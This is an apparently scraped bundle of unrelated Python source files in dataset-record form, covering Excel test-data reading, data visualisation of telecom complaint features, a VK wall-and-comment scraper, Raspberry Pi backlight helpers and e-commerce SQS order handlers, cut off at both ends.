workbook.sheet_names()[0]\n \"\"\"获取sheet1\"\"\"\n table = workbook.sheet_by_name(sheet1)\n \"\"\"通过sheet1获取表格\"\"\"\n\n nrows = table.nrows\n \"\"\"表格中的行\"\"\"\n data_list = list() # 空列表\n data_list1 = list() # 空列表1\n data_list2 = list() # 空列表2\n for i in range(1, nrows): # 从第1行到第n行循环\n # print(table.row_values(i))#获取table中每行所有值\n # print(table.row_values(i)[2])#获取table中每行 中 特定列的值\n n = json.loads(table.row_values(i)[2]) # 将字符串转化成json(列表)\n data_list.append(n)\n \"\"\"n 追加到列表里面\"\"\"\n # print(list(n))\n # print(data_list)\n for e in data_list: # 循环这个列表获得username,password、expect....\n data_list1 = list() # 空列表1\n # print(e['username'])\n # print(e['password'])\n # print((e['code']))\n # print((e['expect']))\n data_list1.append(e['username'])\n data_list1.append(e['password'])\n data_list1.append(e['expect'])\n # print(data_list1)\n data_list2.append(data_list1)\n print(data_list2)\n return data_list2\n\n\nif __name__ == '__main__':\n handler_excel()\n","sub_path":"data/read_login_data.py","file_name":"read_login_data.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"33900209","text":"\"\"\"\n数据可视化\n\"\"\"\nimport common\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn import preprocessing\nfrom data_processing.data_utils import get_clean_raw_data, num_features, bool_features\n\nfrom other.other_utils import beep\n\nfeatures = '../../data/3月用户相关数据.csv'\nlabel = '../../data/3月被投诉用户.csv'\n\n\ndef bool_feature_distribution():\n \"\"\"\n 对label分组,考察label关于不同布尔型特征的分布\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n\n # for col in bool_features:\n # print(data_all.groupby('label')[col].value_counts().unstack())\n\n grouped = data_all.groupby('label')\n for col in bool_features:\n toplot = grouped[col].value_counts().unstack()\n print(toplot)\n print('############################')\n # toplot.plot(kind='bar')\n # plt.show()\n\n\ndef num_scatter_all_magnifier():\n \"\"\"\n 数值型特征之间的二维散点图,包含0和1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n count = 0\n feature = ['beijiao_times', 'zhujiao_jt']\n for ind in range(100):\n for i, f1 in enumerate(feature):\n for f2 in feature[i + 1:]:\n label0_x = label0_df[f1]\n label0_y = label0_df[f2]\n label1_x = label1_df[f1]\n label1_y = label1_df[f2]\n fig, ax = plt.subplots()\n index = label1_df[f1].index\n view_point_x = label1_df[f1][index[ind]]\n view_point_y = label1_df[f2][index[ind]]\n print(f1, f2)\n print(view_point_x, view_point_y)\n view_scope_x = 10\n view_scope_y = 10\n ax.set_xlim(view_point_x - view_scope_x, view_point_x + view_scope_x)\n ax.set_ylim(view_point_y - view_scope_y, view_point_y + view_scope_y)\n\n ax.scatter(x=label0_x, y=label0_y, color='b', marker='x', label='label=0')\n ax.scatter(x=label1_x, y=label1_y, color='r', marker='+', label='label=1')\n ax.set_xlabel(f1)\n ax.set_ylabel(f2)\n ax.legend()\n plt.show()\n # ax = label0_df.plot.scatter(x=x1, y=x2, color='b', marker='x', label='label=0')\n # label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1', ax=ax)\n # plt.show()\n # plt.savefig('../notes/image/scatter-all/' + x1 + '--' + x2)\n # plt.savefig('../../notes/image/scatter-all-no-outlier/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef num_scatter_all():\n \"\"\"\n 数值型特征之间的二维散点图,包含0和1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n print(data_all.shape)\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n count = 0\n for i, x1 in enumerate(num_features):\n for x2 in num_features[i + 1:]:\n print(x2)\n ax = label0_df.plot.scatter(x=x1, y=x2, color='b', marker='x', label='label=0')\n label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1', ax=ax)\n # plt.show()\n plt.savefig('../../notes/image/scatter-all-delete-outliers/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef num_scatter_1():\n \"\"\"\n 数值型特征之间的二维散点图,只包含1类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n label1_df = grouped.get_group(1)\n count = 0\n for i, x1 in enumerate(num_features):\n for x2 in num_features[i + 1:]:\n label1_df.plot.scatter(x=x1, y=x2, color='r', marker='+', label='label=1')\n plt.show()\n # plt.savefig('../notes/image/scatter-1/' + x1 + '--' + x2)\n count += 1\n print(count)\n print('done')\n print('all:', count)\n\n\ndef box_plot():\n \"\"\"\n 盒图\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n # data = preprocessing.scale(data_all)\n data = pd.DataFrame(data_all)[num_features]\n # num_features,bool_features\n for col in num_features:\n data[col].plot.box()\n plt.show()\n\n\ndef pie_bool_all():\n \"\"\"\n 布尔型特征,饼图,正负两类\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n bin_label = ['0', '1']\n for col in bool_features:\n df = data_all[col].value_counts()\n print(df)\n size_0 = df[0]\n size_1 = df[1]\n sizes = [size_0, size_1]\n plt.figure()\n plt.pie(sizes, labels=bin_label, autopct='%1.1f%%')\n plt.title(col + '\\nlabel=0,1')\n # plt.show()\n plt.savefig('../notes/image/pie-all/' + col)\n\n\ndef bar_bool_0vs1_label():\n \"\"\"\n 布尔型特征,条形图,0类中某布尔特征的分布和1类中该布尔特征的分布\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n for col in bool_features:\n df = grouped[col].value_counts().unstack()\n print(df)\n l0f0 = df.iat[0, 0] # label == 0 ,feature==0\n l0f1 = df.iat[0, 1]\n l1f0 = df.iat[1, 0]\n l1f1 = df.iat[1, 1]\n plt.figure()\n plt.suptitle(col, fontsize=14)\n index = [0, 1]\n\n plt.subplot(121)\n plt.title('label=0')\n plt.bar(index, [l0f0, l0f1], color=['#1F77B3', 'r'])\n # 设置数字标注\n for a, b in zip(index, [l0f0, l0f1]):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.xticks(index, ['0\\n' + col, '1\\n' + col])\n\n plt.subplot(122)\n plt.bar(index, [l1f0, l1f1], color=['#1F77B3', 'r'])\n plt.title('label=1')\n for a, b in zip(index, [l1f0, l1f1]):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.xticks(index, ['0\\n' + col, '1\\n' + col])\n plt.savefig('../notes/image/bar-0vs1-label/' + col)\n\n\ndef bar_bool_0vs1_feature():\n \"\"\"\n 布尔型特征,条形图,某布尔特征为0时,label的分布;某布尔特征为1时,label的分布;\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n for col in bool_features:\n df = grouped[col].value_counts().unstack()\n print(df)\n l0f0 = df.iat[0, 0] # label == 0 ,feature==0\n l1f0 = df.iat[1, 0]\n l0f1 = df.iat[0, 1]\n l1f1 = df.iat[1, 1]\n plt.figure()\n plt.suptitle(col, fontsize=14)\n index = [0, 1]\n\n plt.subplot(121)\n y0 = [l0f0, l1f0]\n plt.bar(index, y0, color=['#1F77B3', 'r'])\n # 设置数字标注\n for a, b in zip(index, y0):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.title(col + '=0')\n plt.xticks(index, ['label=0', 'label=1'])\n\n plt.subplot(122)\n y1 = [l0f1, l1f1]\n plt.bar(index, y1, color=['#1F77B3', 'r'])\n for a, b in zip(index, y1):\n plt.text(a, b + 0.05, '%.0f' % b, ha='center', va='bottom', fontsize=10)\n plt.xticks(index, ['label=0', 'label=1'])\n plt.title(col + '=1')\n\n # plt.show()\n plt.savefig('../notes/image/bar-0vs1-feature/' + col)\n\n\ndef kde_plot_all():\n \"\"\"\n 密度图,数值型特征\n :return:\n \"\"\"\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n beep()\n for col in num_features:\n print(col)\n plt.figure()\n data_all[col].plot(kind='kde')\n plt.title(col)\n plt.legend()\n if col == 'mon_use_days' or col == 'open_day' or col == 'use_days':\n plt.xlim(xmin=0, xmax=32)\n elif col == 'zhujiao' or col == 'zhujiao_jt' or col == 'total_count' or \\\n col == 'open' or col == 'close' or col == 'cell_num':\n plt.xlim(xmin=-2000)\n elif col == 'zhujiao_time' or col == 'roam_duration_02':\n plt.xlim(xmin=-20000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-100000)\n else:\n plt.xlim(xmin=-200)\n plt.plot(linewidth=20.0)\n plt.show()\n # plt.savefig('../notes/image/kde-all/' + col)\n beep()\n\n\ndef hist_plot_all():\n \"\"\"\n 直方图(密度图有缺陷),数值型特征\n :return:\n \"\"\"\n # from sklearn.preprocessing import StandardScaler\n data = get_clean_raw_data(features_file=features, label_file=label)\n # X = data[num_features]\n # scaler = StandardScaler()\n # X = scaler.fit_transform(X)\n # print(X.mean())\n # print(X.std())\n # data = pd.DataFrame(X, columns=num_features)\n for col in num_features:\n plt.figure()\n x = np.array(data[col])\n \n # x = np.sqrt(x)\n # plt.hist(x, bins=300, log=True)\n plt.hist(x,bins=100)\n plt.title(col)\n plt.show()\n # plt.savefig('../notes/image/hist-all/' + col)\n\n\ndef hist_plot_0vs1():\n data = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n beep()\n num_features = ['beijiao_times', 'use_days', 'zhujiao', 'beijiao', 'open', 'close', 'open_day']\n for col in num_features:\n plt.figure()\n plt.suptitle(col, fontsize=14)\n\n plt.subplot(211)\n x = np.array(label0_df[col])\n plt.hist(x, bins=300, log=False)\n # label0_df[col].plot(kind='hist')\n plt.xlabel('label=0')\n\n plt.subplot(212)\n x = np.array(label1_df[col])\n plt.hist(x, bins=30, log=False, color='r')\n # label1_df[col].plot(kind='hist')\n plt.xlabel('label=1')\n\n plt.show()\n # plt.savefig('../notes/image/hist-0vs1/' + col)\n beep()\n\n\ndef kde_plot_0vs1():\n data_all = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data_all.groupby('label')\n beep()\n for col in num_features:\n plt.figure()\n grouped[col].plot(kind='kde', legend=True)\n if col == 'mon_use_days' or col == 'use_days' or col == 'open_day':\n plt.xlim(xmin=0, xmax=32)\n elif col == 'zhujiao' or col == 'zhujiao_jt' or col == 'total_count' or \\\n col == 'open' or col == 'close' or col == 'cell_num':\n plt.xlim(xmin=-2000)\n elif col == 'zhujiao_time' or col == 'roam_duration_02':\n plt.xlim(xmin=-20000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-100000)\n else:\n plt.xlim(xmin=-200)\n plt.plot(linewidth=20.0)\n plt.title(col)\n plt.savefig('../notes/image/kde-0vs1/' + col)\n\n beep()\n\n\ndef kde_open_wxtimes_close_cell_num_0vs1():\n \"\"\"\n 统计分布奇怪的特征\n :return:\n \"\"\"\n strange = ['open', 'is_p_app_wx_times', 'close', 'cell_num']\n data = get_clean_raw_data(features_file=features, label_file=label)\n grouped = data.groupby('label')\n label1_df = grouped.get_group(1)\n label0_df = grouped.get_group(0)\n\n beep()\n for col in strange:\n plt.figure()\n plt.suptitle(col, fontsize=14)\n\n if col == 'open':\n plt.xlim(xmin=-5000)\n elif 'close' or col == 'cell_num':\n plt.xlim(xmin=-10000)\n elif col == 'is_p_app_wx_times':\n plt.xlim(xmin=-500000)\n\n plt.subplot(211)\n label0_df[col].plot(kind='hist')\n plt.xlabel('label=0')\n\n plt.subplot(212)\n label1_df[col].plot(kind='hist')\n plt.xlabel('label=1')\n\n plt.show()\n beep()\n\n\ndef quantile_raw():\n \"\"\"\n 未清理的数据的分位数图\n :return:\n \"\"\"\n data = pd.read_csv(features, encoding='utf-8', low_memory=False)\n complain_users = pd.read_csv(label, encoding='utf-8')[\"user_id\"]\n all_users_id = data[\"user_id\"]\n labels = all_users_id.isin(complain_users).astype(\"int\")\n data[\"label\"] = labels\n\n x = np.arange(0, 101, 1)/100\n for col in num_features:\n f = data[col]\n y = np.zeros(len(x))\n for i, v in enumerate(x):\n y[i] = f.quantile(v)\n\n plt.figure()\n plt.scatter(x=x, y=y, s=3, marker='o')\n plt.title(col)\n plt.savefig('../../notes/image/quantile-raw/' + col)\n # plt.show()\n\n\ndef quantile_washed():\n \"\"\"\n 清理后的数据的分位数图\n :return:\n \"\"\"\n data = get_clean_raw_data(features_file=features, label_file=label)\n\n x = np.arange(0, 101, 1)/100\n\n for col in num_features:\n y = np.zeros(len(x))\n f = data[col]\n\n for i, v in enumerate(x):\n y[i] = f.quantile(v)\n\n plt.figure()\n plt.scatter(x=x, y=y, marker='o', s=3, color='green')\n plt.title(col)\n # plt.savefig('../../notes/image/quantile-washed/' + col)\n plt.show()\n\n\ndef main():\n quantile_washed()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"experiments/src/visualization/basic_graph.py","file_name":"basic_graph.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"505673727","text":"__license__ = 'MIT License '\n__author__ = 'Lucas Theis '\n__docformat__ = 'epytext'\n\nfrom numpy import log, array, asarray, mean, std\nfrom numpy.random import randn, permutation\nfrom numpy.linalg import eig\n\ndef preprocess(data, shuffle=True, noise_level=None):\n\t\"\"\"\n\tLog-transforms and centers the data. Optionally, adds some noise.\n\tThe standard deviation of the added Gaussian noise is 1 / C{noise_level}.\n\n\t@type data: array_like\n\t@param data: data points stored in columns\n\n\t@type shuffle: boolean\n\t@param shuffle: whether or not to randomize the order of the data\n\n\t@type noise_level: integer\n\t@param noise_level: add a little bit of noise after log-transform\n\n\t@rtype: ndarray\n\t@return: preprocessed data\n\t\"\"\"\n\n\tdata = array(data, dtype='float64')\n\n\t# log-transform\n\tdata[data < 1.] = 1.\n\tdata = log(data)\n\n\t# randomize order\n\tif shuffle:\n\t\tdata = data[:, permutation(data.shape[1])]\n\n\t# center\n\tdata = data - mean(data, 1).reshape(-1, 1)\n\n\tif noise_level is not None:\n\t\t# add Gaussian white noise\n\t\tdata += randn(*data.shape) * (std(data) / float(noise_level))\n\n\treturn asarray(data, order='F')\n","sub_path":"code/tools/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"411336513","text":"import urllib.request, json, re, os\n\ndef get_wall(no):\n url = 'https://api.vk.com/method/wall.get?count=100&owner_id=' + no\n posts = {}\n comments = {}\n for i in [0,100,200,300,400]:\n if i!=0:\n url = url + '&offset=' + str(i)\n res = urllib.request.urlopen(url).read().decode('utf-8')\n wall = json.loads(res)\n wall = wall['response'][1:]\n for post in wall:\n if post['marked_as_ads'] == 0:\n post_id = post['id']\n print('post_id - '+str(post_id))\n comm_count = post['comments']['count']\n post_info = {}\n post_info['words'] = count_words(post['text'])\n post_info['likes'] = post['likes']['count']\n posts[post_id] = post_info\n com = get_comments(no, post_id, comm_count)\n for k, v in com.items():\n comments[k] = v\n return posts, comments\n \n\ndef get_comments(no, post_id, count):\n comments = {}\n url_comm = 'https://api.vk.com/method/wall.getComments?owner_id='+no \\\n +'&need_likes=1&post_id='+str(post_id)\n tens = int(count/10) + 1\n print('how many tens of comms - ' + str(tens))\n for i in range(tens): \n res_comm = urllib.request.urlopen(url_comm).read().decode('utf-8')\n comms = json.loads(res_comm)\n comms = comms['response'][1:]\n for com in comms:\n com_info = {}\n print('comm_id - '+str(com['cid']))\n com_info['words'] = count_words(com['text'])\n com_info['likes'] = com['likes']['count']\n com_info['from_who'] = get_user_info(com['from_id'])\n comments[com['cid']] = com_info\n return comments\n \n \ndef get_user_info(user_id):\n print('user_id - '+str(user_id))\n user_info = {}\n if user_id > 0:\n url = 'https://api.vk.com/method/users.get?fields=bdate,city&' \\\n + 'user_ids=' + str(user_id)\n res = urllib.request.urlopen(url).read().decode('utf-8')\n user = json.loads(res)\n user = user['response'][0] \n if 'bdate' in user:\n user_info['bdate'] = good_bd(user['bdate'])\n else:\n user_info['bdate'] = '-'\n if 'city' in user:\n if user['city'] != 0: \n user_info['city'] = get_city_name(user['city'])\n else:\n user_info['city'] = '-'\n else:\n user_info['city'] = '-'\n else:\n user_info['bdate'] = '-'\n user_info['city'] = '-'\n return user_info\n\n \ndef count_words(text):\n words = text.split()\n return len(words)\n\n\ndef get_city_name(city_id):\n print('city_id - '+str(city_id))\n url_city = 'https://api.vk.com/method/database.getCitiesById?city_ids='\\\n + str(city_id)\n res_city = urllib.request.urlopen(url_city).read().decode('utf-8')\n city = json.loads(res_city)\n city = city['response'][0]['name']\n print(city)\n return city\n\n\ndef good_bd(bdate):\n dots = re.findall(r'\\.', bdate)\n if len(dots) == 2:\n years = str(2017 - int(bdate[-4:]))\n print(years)\n return years\n else:\n print('no year of bd')\n return '-'\n\n \ndef dump(text, name):\n f = open(name+'.json', 'w', encoding='utf-8')\n json.dump(text, f, indent = 2, ensure_ascii = False)\n f.close()\n\n\ndef posts_to_tsv(posts):\n i = 0\n for key, info in posts.items():\n if i == 0:\n f = open('posts.tsv', 'w', encoding='utf-8')\n i += 1\n else:\n f = open('posts.tsv', 'a', encoding='utf-8')\n text = str(key)+'\\t'+str(info['words'])+'\\t'+str(info['likes'])+'\\n'\n f.write(text)\n\n\ndef comments_to_tsv(comms):\n i = 0\n for key, info in comms.items():\n if i == 0:\n f = open('comments.tsv', 'w', encoding='utf-8')\n i += 1\n else:\n f = open('comments.tsv', 'a', encoding='utf-8')\n text = str(key)+'\\t'+str(info['words'])+'\\t'+str(info['likes'])\\\n +'\\t'+info['from_who']['bdate']+'\\t'+info['from_who']['city']+'\\n'\n f.write(text)\n\n\nif __name__ == '__main__':\n info = get_wall('-53845179')\n dump(info[0], 'posts_che')\n dump(info[1], 'comments_che')\n posts_to_tsv(info[0])\n comments_to_tsv(info[1])\n","sub_path":"hw_4/che_load.py","file_name":"che_load.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"524934433","text":"from module.protocol.network.messages.NetworkMessage import NetworkMessage\n\n\nclass IconPresetSaveRequestMessage(NetworkMessage):\n def __init__(self, buffer_reader, len_type, length, count=None):\n NetworkMessage.__init__(self, buffer_reader, len_type, length, count)\n self.id = 6308\n self.presetId = {\"type\": \"int\", \"value\": \"\"}\n self.symbolId = {\"type\": \"uint\", \"value\": \"\"}\n self.updateData = {\"type\": \"Boolean\", \"value\": \"\"}\n","sub_path":"module/protocol/network/messages/IconPresetSaveRequestMessage.py","file_name":"IconPresetSaveRequestMessage.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41555029","text":"# Collectin of Raspberry Pi related helper functions for interacting with screen\n# brightness.\n\nimport tempfile\nimport logging\nimport inspect\n\n\nHIGH_BRIGHTNESS = 255\nBRIGHTNESS_FILE = \"/sys/class/backlight/rpi_backlight/brightness\"\nPOWER_FILE = \"/sys/class/backlight/rpi_backlight/bl_power\"\n\nlogger = logging.getLogger(\"eventLogger\")\n\n\ndef set_display_backlight_brightness(brightness):\n \"\"\"Write a new brightness value to file.\"\"\"\n with _open_config_file_or_tempfile(BRIGHTNESS_FILE, \"w\") as f:\n f.write(str(brightness))\n\ndef toggle_display_backlight_brightness(low_brightness=12):\n \"\"\"Reads Raspberry pi touch display's current brightness values from system\n file and toggles it between low and max (255) values depending on the\n current value.\n \"\"\"\n old = _get_current_display_backlight_brightness()\n\n # set to furthest away from current brightness\n if abs(old-low_brightness) < abs(old-HIGH_BRIGHTNESS):\n new = HIGH_BRIGHTNESS\n else:\n new = low_brightness\n\n set_display_backlight_brightness(new)\n\ndef toggle_screen_state(state=\"on\"):\n \"\"\"Toggle screen state between on / off.\"\"\"\n value = 1\n if state == \"on\":\n value = 0\n\n with _open_config_file_or_tempfile(POWER_FILE, \"w\") as f:\n f.write(str(value))\n\ndef screen_is_powered():\n \"\"\"Determine whether the screen backlight is currently on.\"\"\"\n with _open_config_file_or_tempfile(POWER_FILE) as f:\n value = f.read().strip()\n\n return value == \"0\"\n\ndef get_and_set_screen_state(new_state):\n \"\"\"Read the current screen power state and set it to new_state. Returns the\n previous value ('on'/'off').\n \"\"\"\n with _open_config_file_or_tempfile(POWER_FILE, \"r+\") as f:\n previous_value = f.read().strip()\n\n f.seek(0)\n value = 1\n if new_state == \"on\":\n value = 0\n f.write(str(value))\n\n if previous_value == 0:\n return \"on\"\n return \"off\"\n\ndef _get_current_display_backlight_brightness():\n \"\"\"Return the current backlight brightness value.\"\"\"\n with _open_config_file_or_tempfile(BRIGHTNESS_FILE, \"r\") as f:\n try:\n value = int(f.read().strip())\n except ValueError:\n value = HIGH_BRIGHTNESS # default to max value if unable to read the file (ie. is a dummy tempfile)\n\n return value\n\ndef _open_config_file_or_tempfile(file_path, mode=\"r\"):\n \"\"\"Return a file object matching a file path. Returns either a\n file object pointing to an existing file or a TemporaryFile if the file\n does not exist.\n \"\"\"\n try:\n return open(file_path, mode=mode)\n except FileNotFoundError:\n stack_value = inspect.stack()[1]\n function = stack_value.function\n argvalues = inspect.getargvalues(stack_value.frame)\n\n logger.warning(\n \"Using tempfile instead of non-existing file %s when calling %s with arguments: %s\",\n file_path,\n function,\n inspect.formatargvalues(*argvalues)\n )\n return tempfile.TemporaryFile(mode=mode)\n except PermissionError as e:\n logging.warning(\"Couldn't open file %s, using tempfile. Original error was\\n%s\", file_path, str(e))\n return tempfile.TemporaryFile(mode=mode)\n","sub_path":"src/rpi_utils.py","file_name":"rpi_utils.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"148126554","text":"my_netflix_favs = [\n 'Stranger Things', 'House of Cards', 'Orange is the new black',\n 'Jessica Jones', 'Narcos', 'Por trece razones'\n]\n\nwhile True:\n target_serie = input('Introduzca la serie que quiere buscar: ')\n if target_serie == ':wq':\n break\n if target_serie in my_netflix_favs:\n pos = my_netflix_favs.index(target_serie)\n print(f'La serie indicada ocupa la posición {pos}')\n else:\n my_netflix_favs.append(target_serie)\n print('Serie añadida a sus Netflix-favs')\n","sub_path":"solutions/data_structures/find_series.py","file_name":"find_series.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"247875821","text":"import uuid\nfrom chalicelib.extensions import *\nfrom chalicelib.utils.sqs_handlers.base import *\nfrom chalicelib.libs.core.sqs_sender import SqsSenderEventInterface, SqsSenderImplementation\nfrom chalicelib.libs.core.logger import Logger\nfrom chalicelib.libs.purchase.core import SimpleSku, Qty, Order\nfrom chalicelib.libs.purchase.order.storage import OrderStorageImplementation\nfrom chalicelib.libs.purchase.customer.storage import CustomerStorageImplementation\nfrom chalicelib.libs.purchase.product.storage import ProductStorageImplementation\nfrom chalicelib.libs.message.base import Message, MessageStorageImplementation\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderChangeSqsSenderEvent(SqsSenderEventInterface):\n @classmethod\n def _get_event_type(cls) -> str:\n return 'order_change'\n\n def __init__(self, order: Order):\n if not isinstance(order, Order):\n raise ArgumentTypeException(self.__init__, 'order', order)\n\n self.__order = order\n\n @property\n def event_data(self) -> dict:\n return {\n 'order_number': self.__order.number.value,\n }\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderChangeSqsHandler(SqsHandlerInterface):\n def __init__(self):\n self.__messages_storage = MessageStorageImplementation()\n self.__order_storage = OrderStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start - {}'.format(sqs_message.message_data))\n\n data = {\n 'order_number': sqs_message.message_data.get('order_number', '') or '',\n 'order_status_mpc': sqs_message.message_data.get('order_status_mpc', '') or '',\n 'popup_message': {\n 'customer_email': sqs_message.message_data.get('popup_message').get('customer_email'),\n 'message_title': sqs_message.message_data.get('popup_message').get('message_title'),\n 'message_text': sqs_message.message_data.get('popup_message').get('message_text'),\n } if sqs_message.message_data.get('popup_message', None) or None else None,\n }\n\n __log_flow('Order: Updating...')\n order_number = Order.Number(data.get('order_number'))\n order = self.__order_storage.load(order_number)\n if not order:\n raise ValueError('Order \"{}\" does not exist in the MPC!')\n\n mpc_order_status = str(data.get('order_status_mpc'))\n order.status = Order.Status(mpc_order_status)\n __log_flow('Order: Updated!')\n\n __log_flow('Order: Saving...')\n self.__order_storage.save(order)\n __log_flow('Order: Saved!')\n\n # Attention!\n # We need to send-back order changes because of compatibility reason.\n __log_flow('Order: SQS Sending-Back...')\n self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n __log_flow('Order: SQS Sent-Back!')\n\n # add message, if is needed (silently)\n try:\n message_data = data.get('popup_message') or None\n if message_data:\n __log_flow('Notification popup: Adding...')\n message = Message(\n str(uuid.uuid4()),\n message_data.get('customer_id'),\n message_data.get('message_title'),\n message_data.get('message_text'),\n )\n self.__messages_storage.save(message)\n __log_flow('Notification popup: Added!')\n except BaseException as e:\n self.__logger.log_exception(e)\n __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n __log_flow('End')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderRefundSqsHandler(SqsHandlerInterface):\n def __init__(self) -> None:\n self.__messages_storage = MessageStorageImplementation()\n self.__order_storage = OrderStorageImplementation()\n self.__customer_storage = CustomerStorageImplementation()\n self.__product_storage = ProductStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start - {}'.format(sqs_message.message_data))\n\n order_number = Order.Number(sqs_message.message_data['order_number'])\n simple_sku = SimpleSku(sqs_message.message_data['simple_sku'])\n qty = Qty(sqs_message.message_data['qty'])\n\n __log_flow('Order Updating...')\n order = self.__order_storage.load(order_number)\n order.refund(simple_sku, qty)\n __log_flow('Order Updated!')\n\n __log_flow('Order Saving...')\n self.__order_storage.save(order)\n __log_flow('Order Saved!')\n\n __log_flow('Order SQS Sending...')\n self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n __log_flow('Order SQS Sent!')\n\n # add message (silently)\n try:\n __log_flow('Notification popup: Adding...')\n customer = self.__customer_storage.get_by_id(order.customer_id)\n product = self.__product_storage.load(simple_sku)\n message = Message(\n str(uuid.uuid4()),\n customer.email.value,\n 'Refund for Order #{}'.format(order.number.value),\n '\"{}\" has been Refunded in Qty {} for Order #{}'.format(\n product.name.value,\n qty.value,\n order.number.value\n ),\n )\n self.__messages_storage.save(message)\n __log_flow('Notification popup: Added!')\n except BaseException as e:\n self.__logger.log_exception(e)\n __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n __log_flow('End')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderPaymentOhHoldHandler(SqsHandlerInterface):\n def __init__(self):\n self.__order_storage = OrderStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n self.__message_storage = MessageStorageImplementation()\n self.__customer_storage = CustomerStorageImplementation()\n self.__products_storage = ProductStorageImplementation()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start : {}'.format(sqs_message.message_data))\n\n if sqs_message.message_type != 'fixel_order_on_hold_by_portal':\n raise ValueError('{} does not know how to handle {} sqs message! Message data: {}'.format(\n self.__class__.__qualname__,\n sqs_message.message_type,\n sqs_message.message_data\n ))\n\n order_number_value = sqs_message.message_data.get('order_number')\n on_hold_status = sqs_message.message_data.get('status')\n\n order_number = Order.Number(order_number_value)\n order = self.__order_storage.load(order_number)\n\n if on_hold_status == Order.Status.CLOSED:\n self.__close_order_on_hold(order, __log_flow)\n else:\n self.__on_hold_not_closed_status(order, on_hold_status, __log_flow)\n\n self.__send_order_change_to_portal(order, __log_flow)\n self.__notify_about_order_status_change_silently(order, __log_flow)\n\n __log_flow('End')\n\n def __on_hold_not_closed_status(self, order: Order, on_hold_status: str, __log_flow) -> None:\n __log_flow('Order Updating...')\n order.status = Order.Status(on_hold_status)\n __log_flow('Order Updated!')\n\n __log_flow('Order Saving...')\n self.__order_storage.save(order)\n __log_flow('Order Saved!')\n\n def __close_order_on_hold(self, order: Order, __log_flow) -> None:\n __log_flow('Updating...')\n\n # close order\n __log_flow('Order Updating...')\n order.status = Order.Status(Order.Status.CLOSED)\n __log_flow('Order Updated!')\n\n # restore products qty\n __log_flow('Product Qty Updating - Start')\n products_to_save = []\n for order_item in order.items:\n if order_item.qty_processable.value == 0:\n __log_flow('Product Qty 